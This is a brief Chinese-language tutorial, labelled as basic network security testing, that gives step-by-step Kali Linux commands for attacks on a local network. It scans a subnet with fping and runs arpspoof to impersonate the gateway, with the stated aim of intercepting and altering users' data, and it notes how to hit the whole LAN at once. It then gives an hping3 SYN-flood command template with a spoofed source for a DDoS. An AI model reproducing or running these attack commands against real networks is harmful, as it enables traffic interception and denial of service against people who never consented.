基础网络安全测试
一、ARP断网测试
目的:伪装成网关,使用户访问请求从我这里经过,通过其他操作(这里未列出),截取用户数据并修改返还。
1.寻找同一网段下的攻击目标。举例:
# fping -asg 192.168.113.2/24 > iplist.txt
查看可以攻击的目标IP:
# cat iplist.txt 如果目标为192.168.113.100
锁定目标后,执行断网操作(使用ip a查看自己的网卡,我的是ens33)
# arpspoof -i ens33 -t 192.168.113.100 192.168.113.2
若去掉参数“t”和目标IP,则直接攻击网关,造成局域网内无差别攻击
二、DDos攻击(以下操作均在kali Linux终端进行)
1.利用hping3进行ddos攻击模拟
目的:通过发送大量请求,攻击目标IP,造成网络过载
hping3 -I eth0 -a [伪装源地址] -S [目标地址] -p [端口] -i [发送间隔]